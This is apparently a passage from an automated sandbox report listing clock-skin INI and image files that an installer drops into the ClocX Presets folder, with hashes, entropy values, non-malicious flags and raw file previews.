SHA1:	50A53B61711EEB3CC200E1B11FF8408DB37ECF2A
SHA-256:	67B31CF35186FFFB4CD13AE825EAF0C71599DDAF2EED5EEC8D791701B7118B73
SHA-512:	A2DECA99EFF12867EEDC7F2CE12700F17F2A5E6F226BB614F1958A6E1CCB1307A2E2D4652C61609D55FD0FBA0518908713B823EC61FBA96E6BAF66FC5786B428
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF2FF ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourColor=0x501A1A ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x501A1A ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=60 ;center point's X (default image_width / 2)..;CenterY=60 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\BubbleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	26311
Entropy (8bit):	7.939197037416011
Encrypted:	false
SSDEEP:	768:xYBlu8IJvxWn5wpAdeR2CsBTw2ybm4LSUJ0sl95O:xIu8IJvxWnO+g8NyfEC95O
MD5:	94575E1B2268EBACFB4349EF05174F80
SHA1:	D7B7F21875C9FDAE5364804E3B4DA77B9D0BE128
SHA-256:	F37F0EE1842F9CEFCFFE4B291C8C247C7A4871252E551150677A86E1575C943C
SHA-512:	01E50869D088D15954E79AE3CCB4C5EDC84F292405AD79AAB4318B0ED6BE18B009D2DCCC33234FBBA88635EFB883EB8DE7E6A07ACE6202767DD231926A515D6C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..f=IDATx.b...?.(... ..F.`d.......0.._.......V.."!3.x8....b.N..U..axj...0..ox&".LT.....e...U[..0............K.)6D.E>....`fB...)..S.j.......KD.. .)6... (_.....\.K.f..3..X..y....)...a.......l.......n.G.............f:.....6..bZ.2.5bI......xD...W..i.H>WS..........Q....N.".R..~..&.h........0.D.4T.".8..:......-.#.......)..a(....cE",..A.X.........o...R..5.....B.49.......&G.<..#p~....w...]...G..$/.,q~.or.....Y...).M.....2VA......=..,.../!.....St.:.u.b.$..>......I./....q9Z.@'.56SB.3.E$.J_.u.7k....yE.T..X7..!...P.L..J.s..G....\|a...`..".0z;....4..k..K.]+..9....A..-...F.U.4....-...0...y$..`.A\| .E.....@.E]....63.w.".l.&.......s)!....S.5@;.D.-q...t...[.NV.PW(\..#.......w$..n..\|:X...../........$..$....i..........>.mPW.....J...{>h..Ak.R.l.W.f.^.A......U....bb\|.....pp.D. PZ.w<..t.....[...S......)B..<...=S.Bl.B.Y......XDN2.......Xr...D.:.!S....

C:\Program Files (x86)\ClocX\Presets\Cappuccino.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.690989170901346
Encrypted:	false
SSDEEP:	12:LXe4EqmYrrrcRQBjpJrpqZ27XFPV+m1nXFPVG99XFPUXFqZ2kp0oH9Gst8ZVB2iU:LdEQrmu9rTOe01knkprdGm8ZWiWN2i
MD5:	FE5BE53D2267788942BB4D382592A376
SHA1:	A6B987CA380DE8FAE09E40A07B1460264B8A3186
SHA-256:	B0296C84A695FB91F33C65A0B7CC0DF52DE0FE610F9327CB07F43A288E7A88E5
SHA-512:	BD4E50321E012324FC0F2651135BBD11908599E7353EEECC1C017F456177DDF3D492A8A46613D11F3CAFEB6C961EC5C05A1FBDE31F8AB206C7C42B851F0D2BEB
Malicious:	false
Reputation:	unknown
Preview:	;Cappuccino ClocX skin by Shak @ AquaXP.com..;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..DisableAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x808080 ;color of hour hand..HourLength=30 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0x404040 ;color of minute hand..MinuteLength=50 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x909090 ;color of second hand..SecondLength=50 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=68 ;center point's X (default image_width / 2)..;CenterY=66 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Cappuccino.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10177
Entropy (8bit):	7.873268670708565
Encrypted:	false
SSDEEP:	192:apbPCmV6zP1UjFjRWkIt68pM3dBvAgc+vlhWH65iHWRUtDOQbHy5RkcP8zY9pz:apb6TpUNRDsYFvPEHWj6cPWo
MD5:	399B9C9DC36DED079B004FAC8A2747E2
SHA1:	769A7A703E83FC62357E8B66017074C911A0616A
SHA-256:	8D47C549094F6868CDDC13042E2136318FEB819CDD3090C5804A98BEA59FC389
SHA-512:	36A8A32407755F6977CFB469A095D86D83CEF2A5FF2F0F6D65D92CF37FAE137D5900A011121E4BEBA0537D0E0A89231DE1AF6580E1D965037923CF255C782C06
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............A>....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..'SIDATx.b...?.(......b...Q@... .....q........O.?..@.....A,Ml.!..V. .X.y........X.161l.C.....0O L..3.....:qss;....011.311I#..U3'J....;....<..}.......>.<x.......H......H@.....%..6.....M..vv6.....,,.@1...AM............;.,,.'..h.W.... ..Z.A.M...I@..GkkC&...733..P...O...)f.J..._.......)........%...J..@......$a.t.T2.._..j.x..DB.0.....y.v....\|h".....D...@.=.`.n...a.. ...j.\|6t....@.........K........p.....@.5.`-M.\8.%(......9..n\..L.Bu.#...........V....(u.......`.&...O.........I(......%.....#...`\|FX...../ZML..._..3...@......e..+W.f.......?,bp%..S..'.\|jP.....>.~..OO.t.Z..w.4...h0$..R..P@m.%%.e@7..+..3.K.]...jBA..#.....8q.((....3...@.1.p..\......w.^...t..X ....0..Xd>)....E b..a6#....Y....8...cI...XXX$ml.w?xps......a...#hX!.H.....@.0.......V?.^..F. . .a....h.....D8!G6#<.Af#'..zj.%.,.B...._O.>.72......V.......H0(%..T........l..P...".0 ....>*..q.K.D..ZZ.............r..=.@..........9s..

C:\Program Files (x86)\ClocX\Presets\CarpeDiem.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.852570033640407
Encrypted:	false
SSDEEP:	24:BEa2rPCkjbHSCEsrTNTOe01rfLkpGdGm8Ri+gFFibQ0Wd9iBxLuQI:B4VbHHIG4dGmSgFyQJTiBxLvI
MD5:	3F95C7C4C98812F4937DE9230FEB4C12
SHA1:	6E9299AE2A062BA6914C4F824CD5B7F7F5FF995E
SHA-256:	9E07C7737174B058C6ECFA5A82B5093D8647467C5A30BE39497F95CC1CD454BA
SHA-512:	F0F4B9FAB8EE3764DAC87AFC8D6AC1AAF95BE4195CBDBBE26C792546861E37D7B6E52BE9CAB157A09257F3F69B58D5880901F12C4EBCC210CC1A1CB107997BEC
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..DisableAMPM=1 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x808080 ;color of AM/PM indicator..AMPMFont=Verdana..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=50..AMPMCenterY=68....DisableDate=0..DateColor=0xEEEEEE..DateFont=Verdana..DateFontSize=10..DateCenterX=61..DateCenterY=75....HourColor=0x800000 ;color of hour hand..HourLength=30 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x800000 ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x808080 ;color of second hand..SecondLength=42 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=59 ;center point's X (

C:\Program Files (x86)\ClocX\Presets\CarpeDiem.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13144
Entropy (8bit):	7.876979908992175
Encrypted:	false
SSDEEP:	384:yznpBXF4w8UxPB6ce72dVBp8qKmTHbdZUH:qXaV7EVhFCH
MD5:	1A5946136A4DAB0C22FD35DCCFAF5D12
SHA1:	1C7641A17EFEE9F3FC5C907ED081BC0763D4CF0B
SHA-256:	5CFD95F49197BA7EBA4BFB2B56B904B6C619EABDE6B2B5ADCEFAC264130F1347
SHA-512:	F92502320244C2CB7AF55DE0364252B71F9061F3262BDDCCE24003F2CA0ADDDB8B7178D65F2FA501AA5C31C744EA304CBF8D6FB43CCFD9E57C1798545ACD0DD8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...~...~......#......pHYs.................gAMA....aLA.... cHRM..z0..............qG...S..8....K..?..2.IDATx.b...?.(.y. .XF..u...A........e....{........'...@.....F._...P.p.S..Ax...>..FI.."..$\...:U......^1.\|.<.=..c.....h.G...2#.0................`1FF.W....apd.....L.S....@9....\.(.AI...............!...J..Ha...0..lP.3.r;P... q.2H........./....$...#8.!4.,.!z.b...C...B...p.%.............'s...R.)ev.....Z9..rF.A...=....B.....t.,.....K-...o......q.:@.B;..%.[..............,.[...41......./._.......t.$..:n.w<......q...3....Kj.....}5an..QU..._...t;.g....-...a....9....Xh..u.\|"..O..l'.}=.,.........d.9..W..Os.....lxHab.j2}j........5.\|J...7....>U..U.C.#j.....N...\|.....0....3..FP.V...$}.x.~.{.....'`..s.7...>..>.{6...6$.xTP........!..O..z.C."..M.)....r.....@.............a...8Px1A+k0........6.ffb....O.-..&...j.'$....{....pA3)..X....n'03....\|.........4../........i..._H....XE.............. ._P...!.>#......t.o........h.".^...5...7#."e.G4...AHK...,@....oV.\<n@!._

C:\Program Files (x86)\ClocX\Presets\Casio.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	4.809680141752885
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx6TORXFB01PRzkpWdGIo81OiDLPEGibQ0Wd9iBxLuQI:BzqFlxFKgMdGJGBLPEpQJTiBxLvI
MD5:	247DB811DD18688D6134FB3199CF5C30
SHA1:	D82D5276AC82EFF8637B71D8EEE54149D17652EC
SHA-256:	EE4BA265429C986667B2B71D21D1FA0FAFEAD643DF2568594A3214F95E0DAC4B
SHA-512:	3248B043CB83682B22DEDABD6E1E83172B9AD9B6E3B473D10DADEDE9542CBF3B95B6B67337ABFE85BF1E91E1110883505C6095EE76B8722BA8D1BA43BA39697C
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....HourColor=000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=5 ;width of hour hand....MinuteColor=000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=4141216 ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=20 ;overlap of second hand..SecondWidth=2 ;width of second hand....CenterX=88 ;center point's X (default image_width / 2)..CenterY=105

C:\Program Files (x86)\ClocX\Presets\Casio.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 190 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	47377
Entropy (8bit):	7.991405637016689
Encrypted:	true
SSDEEP:	768:MgH34monBdcO89MlOEUp9/hXoIuFAMlalsAERfgNJJivcYIt:H0jkm0EUp9/2bFAMklIpQ
MD5:	771989CA35F956E5AF4E43DF7F9E27D5
SHA1:	E38B023D8C57225F7450B2FE0845877DE8C85F05
SHA-256:	264F1F3CA50008D5A28B30E08741663264BD30CD53005A804179BA8F6FB396FA
SHA-512:	FAB9E62E16F77C6B05EF304F696C5606F35BFCFBDCE5CF4A360F51EBEB51F0851B36D6EDC98BE077069394F336AA72C4BFF1D4F1C32F350FBB2B5556C68D7DED
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............Bz.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....].u&x.}9...4r$..........e...hK+iG......)..K3^.5...X.,.-Q.dY...IQL`&H. H......q.w.{n....F...u?.+.~..?.;.i6...Xx.{{8....X ....c........_x,<.............YX...?..@....._x,<.....X ....c........_x,<.....X ...G.?WX..{....y......c...u......,Y.G]]]..d2.~R<..P(D.p.".........<....o...n4.rl......?.S...w...V....)\|.^...R...].r.&''.P(....w......(.>\|.......c-...H..`......@Al.J.......{.......Z.h....R&.A.t..>...cz.>.6.x..-. T\|.D.k..g....Z........~_...a..0.....Q.r.D.\|...Fibb...z...".r9.{...kb\|.2555\(......7..$.....9.1......C.WF..M.phi"._.....8.....V.X.....;D.'.I!....C,9.L(.wtt...7.g..1...1.@.=...%...wx.O...%"q.s=....j........7....{<q/.J........O.-~34\|.X[..A:v.8.<y.....\|>?8==v...b.\9...h4....`......#..::..Y(....'.....R...R.......V5.c..B...g>...=...C.lV..0.."...Te)..C.0...+..=........B.q.``.0.~..S.>...J..z.]a.H..7.3....+.Wc.9to...}sB%...;x.u.X...'N..o....S'.1....

C:\Program Files (x86)\ClocX\Presets\Citizen.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	922
Entropy (8bit):	4.572711077292605
Encrypted:	false
SSDEEP:	24:BEurKluCXTzqr1sRHkLKOLgGLXoIdKghi0uSdUjn:B9K8VPkGUB+UT
MD5:	80C7B322338D51E96594DE91A5E3C603
SHA1:	D1E2F5689E71E04C2A90E0FE44882CAE67AB4AC1
SHA-256:	75C6DE781F983AAA2A4F2BB7315BDD1314C6C3F052435DD378AA0D1F8C0B0CCF
SHA-512:	F7B338B00963A5760261E375458B3135B7AC1E9D6DF87EA2EAC70A436629E4C0C0DF14425209593E947F851C92523E8A0E20D42E3A8E2FCBDD38486EE532C7B5
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=0 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0x2E3543 ;color of hour hand.HourLength=45 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=5 ;width of hour hand..MinuteColor=0x2E3543 ;color of minute hand.MinuteLength=60 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0x2E3543 ;color of second hand.SecondLength=65 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=100 ;center point's X (default image_width / 2).CenterY=99 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Citizen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 199, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	75320
Entropy (8bit):	7.9941540871981
Encrypted:	true
SSDEEP:	1536:Engr3PcDKaKs6I/Dmqji+UUK7Rt+E8VyMkHsBP8jnZ5oi:f3PNnI/Fm+UUKekMkHkP8gi
MD5:	74D7455A9E42EDBA04A1FC8E5D1CA1A4
SHA1:	9D0CD86A18ACA40AAE14018EA9FA8B37A1D929F5
SHA-256:	B2391BB989C145731214525DD323CFE4978C87DD6781FD2A23E1209A2DF7115C
SHA-512:	2D7BCF50805437EDB759480BFD17D2B6C677CDB8DACA23C71AD5F8373E30E8F81A2734B0DC0F23F01B8C3D6DC90C0054BD061BF41F2039BD52DA6B09CAD8BDBB
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............\..K....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..%.IDATx...r.0.E/..`...]...l].....x.L..J.HR...!...4.....6....J:.2M...5.SQ.%...\U..A.1.9....e.K..k.N3..i..;.i.4m.[...4.4.q...i.S......z.0..i...s.P...../K.....<..[MUo..?^...,y....P7.PS..W......E..?.........QQ;.P..U....%O.]~{.........._...2.9J.;.#.K9..:.1....q.gQ.Hn.dY.(..6...T.X.k..-D-......q.0..q...!...%?!.}\]o..9jQ........X.. . ...GQ......Pp.....'...6....r.s.._..mOo9`..`.y.8^cC........7.;....G.v.e.A ..?.hc..+$.E...^ ..n.Z)...tL;..}...n8.....6.SIY..iZ....!.....vwpn..7....._F2.Z!%..+#.r....q.\A_.>..t.B!.k...P....WBY.C.7.w...J..R!.z.....EMz}..d.4.1...}.[......T...?,m..'.{e.. ...[....qad%qr..$L..Ag...._}.^.&.z..=.....BWI...<B.,!DtI.c......o.<...v.c....z... ....0n.z...3......9..j.Q.x.z.T.{N..!C..<...d2.3.>..T..\|7-,*i.jW.d..E(..drF...\..n.<}?Ha.T...............IA....kR..^..uU(.x..'.1......o.Q...8...l. .....7....e........,...j.

C:\Program Files (x86)\ClocX\Presets\CloQ.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	4.793200953489584
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrkBJSaKy4qGTOXZZ410XiOkp5awGIo8bCiqwfQi:BzqFlCSf1qVX4jnDawGJQ8wfn
MD5:	4347579972618D2220B35D400E2497DF
SHA1:	CAE1FE63BE61C08C9880C21AD31C5E0F595596A2
SHA-256:	0901474F95A0FC08BF58F2E34CD2A46F3EE2A0B50742E6AB1D70B471BB084F6C
SHA-512:	B337F9408D55F39D2F781C2941DA02593B596709E5D890BDE69991643B2F18A4CB7A2D30F421477F83899F247306DB06570DAA0326DEB348D69836AE72539433
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x404040.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=9 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0xAA9696 ;color of hour hand..HourLength=20 ;length of hour hand..HourLap=2 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0xAA9696 ;color of minute hand..MinuteLength=30 ;length of minute hand..MinuteLap=2 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=32 ;length of second hand..SecondLap=2 ;overlap of second hand..SecondWidth=1 ;width of second hand....Cen

C:\Program Files (x86)\ClocX\Presets\CloQ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 160 x 110, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12249
Entropy (8bit):	7.972601047733004
Encrypted:	false
SSDEEP:	192:xSx2nqVZzOLi+6PrSjnGhLaU5TZaMRF11U8yAgk0AaUNxTX0acFNNyZik72XdZ:Yx2mlOG+6UGhLxaM91U8ypk0BUNd3NwB
MD5:	49856033126C7EAD5EDC2B3A82504A7E
SHA1:	9FD4B61502C34A93B9C5E401AA84FE661559F575
SHA-256:	A9575B7EBACA877D5693DE98D9298317574BD6463E3EF129F8301C151698227D
SHA-512:	CF38A27ABA93210452431701BCECC53DE6259A244ACE2733F96B1D9A2BA2AAEA58B75FC5208220AB87D725ACF5D2EBEFADD9DD4FC6675E2323B6DADF71A9EE9C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......n......-......bKGD..............pHYs............... .IDATx..yTU... ..Qdo..........Zy.evK.l.WETp..8.9.,5@..T...\..)h...P.+j.5..t...9..}.8......t..a-............A..y..B....'...\|....v....W.......Y.s.5.~v?.m...L.0....,...q..9......,U$.....j.n.8z.h.7.k..m....S.N.....j....N.<...FDDp...3g...Cwww...].P..;...F.h...@+....l..Z.x..r..Z..y...9s.L...133...BH.2%ICI.R.t..............`HH.=<<.woZZZj...`....l...r.l.`8....v..Y.fq.=,++.%.^2Y..p..j....2U5..UMR^.XY)S..58.,_.$...4.YRR.{.r...tuu%.R.!.F.x....;>.!.H.......(...}\|\|...I!$c.&.5ud...........LK;..4&%....Gx.......#LJ:..'N3==.99.1/.....zr.....V..={../g.....@..................wvv...W=...WVV...........xO.?.G..2##.yy.T.....).[bzz:....}{.8..s..*a...!.-.O.....chh(...(..j45.h..{.?.(ff.9.:.=..9h2$%..?.0?..B..Q........e.>}..w....S$\|.M.'.m.xXXX...1.......Z..55Wy..5.tWy.J.O...}....o......YPPDI..<.0.....9.!C.......<.....^.^.8....#G....$.Z..(.Z-../.211...{.{.^......bv..,/..zEm}...\|..v.$\|(.]8.......

C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	4.897976935663915
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9pk/7FoB35k6s4H6T13Z41rfLkc31CGm8bCinCd0X:BzqFlk/7Fy3u67C4ecFCGmQtCd6
MD5:	1FE0CF880A1FBD2C105E85361ECDD3F8
SHA1:	0B49F938CBCBBFB4F28FF070F85F9B01AE02470A
SHA-256:	22A6B9F1430102C28388DC50604FA010EAAE46778E1DEF800A8ACDF12B91F8C2
SHA-512:	B6FC3892CECB7AAA5CE4880B2518B01BF2796AC5BCD82A8CD4979F6A2E1592CE6E4D9215A09AF448765EEEB0BF5083CE6D4F114C728FA2A8226DF871B7C648A6
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Arial Narrow..AMPMFontSize=7 ;size of AM/PM font..AMPMCenterX=71..AMPMCenterY=173....DisableDate=0..DateColor=0x000000.; gray - 0x787878..DateFont=Arial Narrow..DateFontSize=7..DateCenterX=99..DateCenterY=157....HourColor=0x666666 ;color of hour hand - 0xAA9696..HourLength=35 ;length of hour hand..HourLap=2 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x444444 ;color of minute hand - 0xAA9696..MinuteLength=45 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=47 ;length of secon

C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 150 x 328, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	72778
Entropy (8bit):	7.986758581304158
Encrypted:	false
SSDEEP:	1536:IQSHf6+JZpEmnuiBXnfTb7UXhy/HShAypIe7w0+hdCsX/SOLFI6vD9ccIiUcjk3a:ne6UtVBXnrb70775khX60rvmcPjYa
MD5:	26E6D02144112F1919FCC08AC0F6CE07
SHA1:	7D3D5F287BF72C85C6B14C6F3FA8FD858367B542
SHA-256:	C5FDCEE509EC0AE18872EEA9DAEC67DBDF3C98552DB579B49FB0A88397BD8BEC
SHA-512:	3F4CF5A92673924CC7AA7D29F62C564D94824C9941E6D3A843029A94BF6250AEB0D9C1AB43000BAC4A6305019E50345F75EC10164CC291D7B3D25CCB6355E77E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......H......B......pHYs.........g..R....gAMA....aLA.... cHRM..z%..............R....X..:....o.Z......IDATx....e.u...iOg...9Vf.<....@........d..E.mwKlZjw......b..pG....aw.%..-..$.l.$H.f..9.2o.w<......D".U....PWF.8w.S.......G...}>.?...._\|.......Ws..C.......kw^.........]>......O....;/y........9.\|.;.p70......................?V.}M...w...E...H..<..u...?D...X.F...[....H..P.....&.PI.......!e.Q...!.n,...1F.>`..x..n.......1.......l)M.O.{.ht;...@3E.g'O.XY...{E>...K.....c.....O..'...i...!M..m...J...^.....eU9...].....b......I....-..#.....1..]...v.K.c.....~@..[*.B.duu.__].......6..WWO...'G.....:0PB.....4u.^x.EU....\|P..L...".L.L.c/...\|....c.."H)...km\.$m...Q..M....d:-.j.\.GW._?.L...\|........:..)C].....p.h....Gq..... b..u..(}.e....?/.4E...a...6....'O.^_.....!.5M.R....\.mk..2...$.\|:..w.a:.r..}lll0..q..!.RP..@)u.m.R"...J+..0..<M.Wx...!X..M.m].....h..{}n.Y..6+..j..eC..}..._..w.^.qp.6`U@}.u.l... b...n.{n....y.L.^.I.............d..S...VF..O?..

C:\Program Files (x86)\ClocX\Presets\DSX4.BMP

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 172 x 172 x 24, image size 88752, resolution 7874 x 7874 px/m, cbSize 88806, bits offset 54
Category:	dropped
Size (bytes):	88806
Entropy (8bit):	2.418590036691463
Encrypted:	false
SSDEEP:	192:zcQE3KmYlXNZqpg7fGMGXGk+z19sLtNfcCuzE73qAWxmmXbDyio52j8USDPsA:GKTXNsC7fGMGMzKcCFqLxDDyiOPUSrsA
MD5:	858779477D2CD597F1A2B379F25F2393
SHA1:	0639E3C09E3007B2B81E07A7F1FEDD80C340F325
SHA-256:	D08BB435160F30217FF90D2586E6178A5927787A453CA2B5B9F1F45F4D548D1F
SHA-512:	8635144EA3505FC2F17DB349913759B18BEB132C6ABE7CCF2E9FB672897A577A5DBB3937A2D7964A2F212D5CB6233AA0C3DE598862A26CA8177A76BECC06858E
Malicious:	false
Reputation:	unknown
Preview:	BM.Z......6...(....................Z....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\DSX4.TXT

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.505459612613831
Encrypted:	false
SSDEEP:	3:FERjVM0lLLiRFQLZQ:FERjzR66Q
MD5:	CCA118DA9D40AA92B4C49EA17402E071
SHA1:	933017121E0B936B1FF2BE7E3A0BAB114540E8D7
SHA-256:	3B5AECD81B46AAA3BEDAD81DE9A9B988F80B9EBA4552957500B842E61B27570B
SHA-512:	B5575F2BA60E965A7C1E589F24B2B1B5A1D17E05A5A24199AF778461F428F251D1D83DC3BE65C95111D8C06F1981AA384F2B88005877B1A6F2F63549275A17A4
Malicious:	false
Reputation:	unknown
Preview:	Creator of this background (dsx4.bmp) is jonnybravo.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	699
Entropy (8bit):	5.1520962367864565
Encrypted:	false
SSDEEP:	12:a4EqmYrrrcR5pjpJrtOphhAlL4GOy46hp7pEH3eJvzpEH9CPpEHoNlTYQBcpwcz:BEQrm5b7OSF4G66hpOUvm0SIrJi
MD5:	9873AB1C4F582F7DBA405E18BF9EC1F5
SHA1:	2ED9BB9613EBF3B11B334F0132C3AD7C24C64E28
SHA-256:	02908C5B2E4603C69ABBD0F6DD5BE49B2AE0C68036624C3001574B8F87970C1C
SHA-512:	25F9B0B0629FEE815574FEB5738352838AF8B01FFB13634DF1735CEF394DAB551F8448EC53A18A4C01983B8784B3290BC067F5A772EB5CA8521CCB520B0AF2BE
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xff0000 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....DisableDate=0..DateColor=0xFF0000..DateFont=Arial Rounded MT Bold..DateFontSize=24..DateCenterX=126..DateCenterY=263....HourPNG=DarkCrystalBall\hourhand-7.png..HourPNGCenterDist=1....MinutePNG=DarkCrystalBall\minutehand-7.png..MinutePNGCenterDist=1....SecondPNG=DarkCrystalBall\secondhand-7.png..SecondPNGCenterDist=1....CenterX=129 ;center point's X (default image_width / 2)..CenterY=121 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 259 x 293, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18381
